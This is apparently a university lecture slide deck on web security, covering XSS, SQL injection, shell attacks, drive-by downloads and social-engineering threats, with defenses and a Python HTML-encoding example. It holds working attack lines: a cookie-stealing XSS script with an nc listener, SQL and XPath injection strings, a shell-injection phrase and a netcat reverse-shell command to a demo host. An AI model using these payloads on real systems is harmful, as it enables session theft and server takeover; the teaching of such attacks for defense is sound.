
1 Web Security

2 Objectives
Understand the complexity of Web infrastructure and current trends of Web threats
Understand the mechanisms and defenses of major Web attacks: XSS, SQL injection and shell attacks

3 Why Web Security: a Real Business Problem
> 60% of total attack attempts observed on the Net are against Web applications
> 80% of vulnerabilities discovered are in Web apps
Independent security audit
Regulatory compliance
* SANS/TippingPoint, based on March-August 2009 data

4 Auditor Finding
Freeform edit box: XSS issue raised
Message to Customer Service: XSS issue raised
Must provide a response:
  Prove the issue to be a non-problem, or
  Describe actions to take

5 Anatomy of Web Attacks
Attacker breaks into a legitimate website and posts malware
  Malware is no longer exclusive to malicious Web sites
Attacking end-user machines
  Malware on a Web site makes its way down onto a user's machine when that user visits the host Web site
  "Drive-by-download": happens automatically, with no user interaction required
  Additional techniques do require some input from the user, but in practice are equally, if not more, effective
Leveraging end-user machines for malicious activity

6 Anatomy of Web Attacks Source: Web Based Attacks, Symantec 2009

7 Web Applications
Big trend: software as a (Web-based) service
  Online banking, shopping, government, etc.
  Cloud computing
Applications hosted on Web servers
  Written in a mixture of PHP, Java, Perl, Python, C, ASP
Security is rarely the main concern
  Poorly written scripts with inadequate input validation
  Sensitive data stored in world-readable files

8 Typical Web Application Design
Runs on a Web server or application server
Takes input from Web users (via the Web server)
Interacts with back-end databases and third parties
Prepares and outputs results for users (via the Web server)
Dynamically generated HTML pages
  Contain content from many different sources, often including regular users
    Blogs, social networks, photo-sharing websites...
  Web advertisements, usually third party
A webpage can have content coming from different domains

9 Chicago Tribune Home Page

10 Two Sides of Web Security
Web browser (front end)
  Can be attacked by any website it visits
  Attacks lead to malware installation (keyloggers, botnets), document theft, loss of private data
Web application (back end)
  Runs at the website: banks, online merchants, blogs, Google Apps, etc.
  Written in JavaScript, PHP, ASP, JSP, Ruby, ...
  Many potential bugs: XSS, SQL injection, XSRF
  Attacks lead to stolen credit cards, defaced sites, etc.

11 How Are Legitimate Web Sites Compromised?
SQL injection attacks
Cross-site scripting (XSS) attacks
Vulnerabilities in the Web server or forum hosting software (e.g., shell attacks)
Malicious advertisements
  Many Web sites today display advertisements hosted by third-party advertising sites
  The volume of ads published automatically makes detection difficult
  Random appearance further compounds the detection problem
Search engine result redirection
Attacks on the back-end virtual hosting companies

12 We need application layer protection as well!

13 JavaScript
Language executed by the browser
  Scripts are embedded in Web pages
  Can run before the HTML is loaded, before the page is viewed, while it is being viewed, or when leaving the page
Used to implement "active" Web pages
  AJAX, huge number of Web-based applications
Many security and correctness issues
  Attacker gets to execute some code on the user's machine
  Often used to exploit other vulnerabilities

14 Cross Site Scripting
Attacker goal: get their code into the victim's browser
XSS forces a website visitor to execute malicious code in his/her browser
Accounts for roughly 80% of all documented security vulnerabilities

15 XSS Risks
XSS abuses rendering engines or plug-ins
Steal browser cookies
Steal session info for a replay attack
Malware or bot installation
Redirect or phishing attempt

16 XSS Example 1
Trudy posts the following JavaScript on a message board:
<script language="javascript"> var url = " encodeURI(document.cookie); </script>
Then run a TCP server listening on port 5000 with, e.g., nc -l 5000
When Bob views the posted message, his browser executes the malicious script, and his session cookie is sent to Trudy
The same principle applies to RSS/Atom injection, where feed content is supplied by the client
RSS is a family of Web feed formats used to publish frequently updated digital content, such as blogs, news feeds or podcasts. The initials "RSS" are variously used to refer to the following standards:
  Really Simple Syndication (RSS 2.0)
  Rich Site Summary (RSS 0.91, RSS 1.0)
  RDF Site Summary (RSS 0.9 and 1.0)

17 Web Attack Demo Flow Chart
(dod)

18 XSS Demo Instructions
Set up a port forward to bypass the firewall:
ssh -L 9000:netsec-demos:2000
Note: 9000 is the local port; it is forwarded to netsec-demos port 2000 through the hamsa proxy
Use to access

19 XSS Demo Instructions (II)
Login as ychen and post the script with a sexy title (e.g., "hot game!")
<script language="javascript"> var url = " url = url + encodeURI(document.cookie); new Image().src=url; </script>
Hi Everyone! Thanks for your cookies!
Ssh to that machine (dod.cs.northwestern.edu) and run nc -l -p 5000
For multiple students to test together, different port numbers are needed

20 Simple XSS Code
var url = " encodeURI(document.cookie);
document.cookie is the browser's entire cookie string for the current website
encodeURI() is a JavaScript function that hex-encodes certain characters so they can be included as part of a URL
  E.g., changing the space character to %20
  Makes the URL less suspicious

21 What Can Trudy Do with the Cookie?
Another user, test458, logs in, and when clicking the post the cookie is sent to the attacker
Crack Bob's password (MD5 hash in the cookie) with John the Ripper, Hydra, or any password cracker
For more info, use a Firefox plugin like TamperData to reset your cookies to impersonate Bob

22 XSS Detection
A client usually is not supposed to send scripts to servers
If the server receives <SCRIPT>... or the hex equivalent in an incoming packet, and that same script is sent unsanitized in an outgoing packet, then an attack has occurred
A sanitized script could look like &lt;SCRIPT>...
Any user input must be preprocessed before it is used inside HTML
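Added example (not from the slides): the server-side HTML encoding the slide calls for, next to the detection rule it describes, run over a constructed message-board post supplied once literally and once hex-encoded. The page markup and the sample post are assumptions.

```python
import html
import re
from urllib.parse import unquote

# Constructed sample post, once literal and once hex (URL) encoded as the slide describes
RAW_POST = 'hot game! <script>alert(1)</script>'
HEX_POST = 'hot%20game!%20%3Cscript%3Ealert(1)%3C/script%3E'

# A whole <script>...</script> element, case-insensitive, spanning lines
SCRIPT_ELEM = re.compile(r"<\s*script\b.*?<\s*/\s*script\s*>", re.IGNORECASE | re.DOTALL)


def decode_fully(data: str) -> str:
    """Undo URL/hex encoding until stable, so %3Cscript%3E is seen as <script>."""
    prev = None
    while prev != data:
        prev, data = data, unquote(data)
    return data


def sanitize_for_html(user_input: str) -> str:
    """The slide's sanitization: HTML-encode so '<' becomes '&lt;' and the
    browser renders the text instead of executing it."""
    return html.escape(user_input, quote=True)


def render_unsafely(post: str) -> str:
    """Vulnerable pattern: user input concatenated straight into the page."""
    return '<div class="post">' + post + "</div>"


def render_safely(post: str) -> str:
    """Hardened pattern: every user-supplied string is encoded before insertion."""
    return '<div class="post">' + sanitize_for_html(post) + "</div>"


def xss_reflected(incoming: str, outgoing: str) -> bool:
    """Detection rule from the slide: a script element arrived from the client
    (possibly hex-encoded) AND the identical element leaves the server unencoded.
    The response is not decoded: it is checked as the browser will parse it."""
    for match in SCRIPT_ELEM.finditer(decode_fully(incoming)):
        if match.group(0) in outgoing:
            return True
    return False
```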

23 SQL Injection
Malicious SQL statements run on a database and thus attack the server
XSS can only target other users

24 SQL Injection Example
Trudy accesses Bob's website, in which he does not validate input on his sign-in form
It runs a SQL statement like the following:
select username, user_password from minibbtable_users where user_password = md5('johnspassword') and username='johndoe';
Set username to: ' or '1'='1
select username, user_password from minibbtable_users where user_password = md5('anyrandompassword') and username='' or '1'='1';
Effect: picks any row where the username is blank and the password matches, or any row at all, since '1'='1' is always true
  Add "limit 1" to pick the first row
In the password field, she types as her password: X" OR "x"="x
Manipulates the server into running the following SQL command:
SELECT * FROM ACCOUNTS WHERE username = "USER_NAME" AND password="X" OR "x"="x";
Selects all account information

25 SQL Injection Detection
Input validation on any outgoing SQL statements from the Web server to the database server
  Filter apostrophes, semicolons, percent symbols, hyphens, underscores, ...
  Any character that has a special meaning must be escaped, e.g., convert ' into \'
    Only works for string inputs
    Different databases have different rules for escaping
  Check the data type (e.g., make sure it's an integer)

26 Shell Attacks
Control an actual machine like a Web server

27 Shell Attacks
Inject commands into scripts that use Linux utilities
  E.g., with ";" as the command separator in UNIX/Linux
CGI programs (e.g., in Perl) can use command-line programs (e.g., grep, ls)
Unsanitized input passed as arguments can lead to command execution

28 Shell Attacks Demo
The search engine in the MiniBB Web server executes:
system("echo $user_usr " . $phrase . " >>/tmp/searchlogs");
Put the phrase as: >/dev/null; id; echo randomdata
  Hides the user ID
  Stores random data in the logs to evade detection
We can even get a remote shell!
>/dev/null; nc dod e /bin/sh

29 Defense Approaches
Web firewall/IDS
  ModSecurity for Apache
  Commercial: SecureSphere from Imperva
Static code analysis
  Open source: Nikto
  Commercial: Acunetix Web Vulnerability Scanner, N-Stalker
Education on good coding
  HTML encoding on input (server-side)
  Input validation/filtering

30 XSRF

31 Discussion of Symantec White Papers:
GETTING ONTO A USER’S COMPUTER (AUTOMATICALLY)

32 GETTING ONTO A USER’S COMPUTER
Source: Web Based Attacks, Symantec 2009

33 Drive-by Download Attacks
Techniques used to deliver malware from Web sites to a user's computer
Exposure: browsing a website
  No user interaction is required
  Executable content is automatically downloaded
  Exploits the browser's vulnerabilities

34 “Click Jacking”

35 GETTING ONTO A USER’S COMPUTER (WITH A LITTLE HELP FROM THE USER)

36 Social Engineering
People are tricked into performing actions they would not otherwise want to perform
Source: Web Based Attacks, Symantec 2009

37 Types of Social Engineering Attacks
Fake codec
Malicious peer-to-peer (P2P) files
Malicious advertisements
Fake scanner Web page
Online social networks (OSN)/blog spam
Other attack vectors
  Spam
  Pirated software

38 Fake Codec
User is prompted to install a missing codec
Codec is actually malware code, usually a trojan horse

39 Malicious Peer-to-Peer (P2P) Files
Malware authors bind content into popular applications
  Files named after celebrities, popular bands
  Uploaded to popular P2P sites, where they are downloaded by unsuspecting users
Openly available how-to materials on the Internet
  Detail how to build and distribute malware
  Pay-per-install malware

40 Fake Scanner and Pirated Software
Create a Web site or product that misrepresents the truth
  JavaScript pop-ups notifying of a false need to install operating system updates
  Tools that claim to scan for and remove adult images, etc.
Source: Web Based Attacks, Symantec 2009

41 Online Social Networks (OSN)
Among the world's most visited websites by Alexa ranking:
  #2 Facebook: 1.35 billion monthly active users by Jul 2014
  #10 Twitter: 284 million users by Oct 2014
  #14 LinkedIn: 332 million users by Nov 2014
Online social networks have become extremely popular among Internet users. According to Alexa, Facebook is the 2nd most visited website, Twitter the 10th, and LinkedIn the 14th. With tremendous popularity, online social networks have also attracted attackers. In this study, we target the spam problem.

42 Scary OSN Spam Stats
billion tweets posted to Twitter every day are spam
percent of Twitter's user base is bots and spam bots

43 OSN Spam and Defense
1. All commercial OSNs adopt a client-server architecture. The users interact with each other through well-defined interfaces, and the service provider mediates all interactions.
2. However, not all users are necessarily benign. Suppose we now have a bad user, A, and a legitimate user, B.
3. A sends a spam message to user C, while B sends a legitimate message to user D. In this example a message always has one sender and one receiver. Nowadays a popular way of using a social network is to broadcast a message; for example, messages in Twitter are broadcast to all followers. For simplicity, we treat a broadcast message as equivalent to a message sent to each of the recipients.
4. Next, the service provider receives the messages and waits for the recipients to sign in.
5. Once the recipients sign in, the service provider renders the messages to them. D receives a legitimate message, which is fine. C receives the spam and is exposed to various kinds of fraud.
6. Our goal is to design an online spam filter to deploy as part of the OSN platform. It inspects every message before the message is rendered to the recipient.

44 How to Protect Yourself
Client side
  Update and patch software
    Get the latest OS, browser and application patches
    Browser plug-in updates are often forgotten
  Endpoint protection software
    Anti-virus software for signature-based detection and behavioral monitoring
    Keep the protection software subscription updated
  Be suspicious
    Avoid things that seem too good to be true
  Adopt a strong password policy
Server side: Web Application Firewall (WAF)
By way of example, consider that Symantec currently delivers protection for well over 10,000 new virus samples each day. A week of not updating would mean that a user is missing protection for 70,000 new unique virus variants.

45 Summary
Complexity of Web infrastructure and current trends of Web threats
Mechanisms and defense of major Web attacks
  XSS
  SQL injection
  Shell attacks
New Web attack trends in the Symantec white paper

46 Backup Slides

47 Existing Systems Comparison
System              | Content-based/URL-based | Dynamic/Static | Training Set           | Input | Output
IronPort            | Both                    | Mixed          | URLs from 100,000 Orgs | URL   | Malware, Phishing, and Spam
Safe Browsing       | Content-based           | Dynamic        | N/A                    |       | Malware and Phishing
Web of Trust        | URL-based               | Static         | User Comments          |       |
Trend Micro Web Rep | Not Public              |                |                        |       |
McAfee              |                         |                |                        |       |

48 Intelligent Cloud Network
Components: Web Reputation Agent; Web Sandbox (dynamically executing Web pages); URL Classification Engine; Crowd Sourcing Engine; Phishing Detection Engine; Result Processing Center; Webpage Static Detection Engine
The Web Reputation Agent passes URLs to four fast detection engines: Crowd Sourcing, URL Classification, Phishing Detection and Webpage Static Detection. These four engines are lightweight and can therefore detect very fast. They return their scores to the Result Processing Center (RPC), which standardizes the four scores and generates a final score. If the final score strongly indicates that the URL is legitimate or malicious, the RPC returns the score to the Web Reputation Agent. Otherwise, the RPC passes the URL to the Web Sandbox, a heavyweight detection engine that examines the URL by executing its content.

49 XSS Example 2
Trudy sends Bob a link to a URL that will take him to a personalized page
A page is returned that contains the malicious script, and Bob's browser executes the script, causing his session cookie to be sent to Trudy
Hex is often used in place of ASCII for the JavaScript to make the URL less suspicious

50 XPATH Injection Example
Similar to SQL injection
Bob has a form that does not sanitize user-provided input before using it as part of an XPath query:
string(//user[name/text()='USER_NAME' and password/text()='USER_PASS']/account/text())
Trudy again can provide the following password to change the statement's logic: X' OR 'x'='x
The statement thus selects the first account

51 LDAP Injection Example
Server using LDAP for authentication
User name is initialized, but then unchecked user input is used to create a query:
filter = "(uid=" + CStr(userName) + ")" ' searching for the user entry
Attacker can exploit this using special characters

52 LDAP Injection Detection
Detection is based on the usage of special LDAP characters
System monitors input for special characters
Either scrubs incoming input or watches for unescaped output passed to the database server
Detection approach is black-box

53 SSI Injection Example
Bob has his server configured to use Server-Side Includes
Trudy passes input with an SSI directive embedded: <!--#INCLUDE VIRTUAL="/web.config"-->
SSI inserts the malicious code into normal webpages upon the next request
Future legitimate users get content containing the tainted code included by the SSI

54 JSP Injection Example
Similar to SSI injection
Bob has a portal server configured to use dynamic code for templates
Trudy passes input with an embedded <jsp:include " >
Malicious code is inserted into the webpage

55 JSP Injection Prevention
Prefer static include <%include ...>
Don't allow file inclusion outside of the server via Java 2 Security policies
Firewall rules to prevent outbound requests from the server
Input validation coding
Choose portal software not requiring dynamic includes or code execution

